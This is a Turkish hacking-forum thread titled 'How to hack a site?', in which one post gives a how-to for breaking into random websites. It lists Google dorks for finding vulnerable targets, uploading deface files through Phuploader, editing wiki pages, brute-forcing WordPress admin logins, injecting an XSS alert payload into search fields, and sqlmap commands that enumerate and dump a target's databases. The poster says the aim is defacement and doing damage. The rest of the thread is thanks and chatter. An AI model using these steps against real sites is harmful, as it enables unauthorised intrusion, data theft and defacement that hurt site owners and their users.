Site Nasıl Hacklenir?

[ghostkurts]

To view the content, you need to Sign In or Register.

 

[The Roza]

Eline Sağlık knk hidde ekle emegin boşa gitmesin çalıyorlar konuları bide etkileşimin artar

 

[ghostkurts]

Eline Sağlık knk hidde ekle emegin boşa gitmesin çalıyorlar konuları bide etkileşimin artar

Ekledim aslında :/

 

[TEĞMEN]

1 - Upload Açığı ile site hackleme

Dork: intitle:"Powered by Phuploader"
Bunu Googlede aratırıyoruz ve sitelere tek tek indeximizin resmini yada html dosyasını yüklüyoruz.

2 - Waka wikii açığı ile hackleme

Dork: wakka.php?wiki=
Örnk: hacktivizm.org/wikini/wakka.php?"wiki=7juin/edit" linkin sonuna /edit koyuyoruz
Not: Siteye zarar vermez sadece zone kasmak icin kullanılabilir

3 - Brute Force ( Kaba Kuvvet )

Bu bir açık değildir. site üzerinde belirlenen admin - admin listesini kontrol eder ve olumlu sonucları size gösterir.
Dorukumuz:
/wp-content/plugins/hits
/wp-content/plugins/last
/wp-content/plugins/send
/wp-content/plugins/note
/wp-content/plugins/climb
/wp-content/plugins/sorry
/wp-content/plugins/gear
/wp-content/plugins/nothing
/wp-content/plugins/all
/wp-content/plugins/after

Arama motor isimli programımıza yapıştırıp araya basıyoruz bulunan siteleri kaydetip brute force adlı programımızı açıyoruz
Admin Ve Passlarımız ekliyip başlata basıyoruz. bulunan sonuclar alta gözükücektir. (DETAYLI BİLGİ İCİN @ghostkurts a instgram yolu ile iletisime geciniz)

4 - XSS Açığı

bu benim en çok kullandım açıklardan biridir.

Dorkumuz: index.php?id=
rasgele sitede bulunan arama butonlarına <script>alert(“Ghost Kurts”);</script> yapıştırıyoruz
Örnekhacktivizm.org/index.php?id=<script>alert(“Ghost Kurts”);</script> )
Not : Her Sitede 100% XSS Açık Olacak Diye Birşey Yok

5 - SQL Açığı

En Fazla Kullanılan Açıktır ve Çok Sağlam Zararlar Vura Biliriz.
Bilgisiyarımıza sqlmap kurduktan sonra cmdye açıyoruz ve şu komutları yazıyoruz.

cd ..

cd ..

cd sqlmap

sqlmap.py -u www.hacktivizm.org/index.php?id=5 --dbs

Karşımızda Aşağılarda " available_database " Olacaktır Onun Altındakiler Bizim Databaselerimiz
Sonrasında İstediğimiz Databaseden Veri Çekmeye Başlıyoruz

sqlmap.py -u www.hacktivizm.org/index.php?id=5 -D Databaseismi --tables

sqlmap.py -u www.hacktivizm.org/index.php?id=1 -D Databaseismi -T veriadı -C kolon1,kolon2,kolon3 --dump

SqlMap İndirme Linki: https://sqlmap.org/

30dkya yakın zaman harcadım alırım bir teşşekürü*** Hidden text: cannot be quoted. ***

Eline sağlık teşekkürler

 

[The Roza]

Ekledim aslında :/

Neden Olmamış :/

 

[RootAyyıldız]

ilk 3 salla 0nlar öyle hecktir defacedir sayılmaz diğerleri iyidir he ama senin dedigin xss refled moruk onunla deface edilmez bi sayfa stored bulursan işe yarar aksi taktirde öyle zone nin bi faydası olmaz

 

[ghostkurts]

Eline sağlık teşekkürler

Eyvallah

 

[ghostkurts]

ilk 3 salla 0nlar öyle hecktir defacedir sayılmaz diğerleri iyidir he ama senin dedigin xss refled moruk onunla deface edilmez bi sayfa stored bulursan işe yarar aksi taktirde öyle zone nin bi faydası olmaz

Aynen

 

[Can]

KONUNU ŞU IKI KODUN ARASINA ALARAK YAZMALISIN

[REPLYANDTHANKS]

KONUNUZ

[/REPLYANDTHANKS]

 

[Ensigma]

*** Hidden text: cannot be quoted. ***

Es

 

[zherixroot]

*** Hidden text: cannot be quoted. ***

look

 

[Babayiğit]

*** Hidden text: cannot be quoted. ***

eline sağlık kral

 

[RedEnergy]

*** Hidden text: cannot be quoted. ***

Eline sağlık

 

[ghostkurts]

KONUNU ŞU IKI KODUN ARASINA ALARAK YAZMALISIN

*** Hidden text: cannot be quoted. ***

eyvallah

 

[ghostkurts]

Es

eyvallah

 

[ghostkurts]

Herkese eyvallah beyler

 

[r4uch]

uuu

 

[ghostkurts]

uuu

 

[Bay Tilki]

*** Hidden text: cannot be quoted. ***

Eline sağlık kardeşim

 

[ghostkurts]

Eline sağlık kardeşim

eyw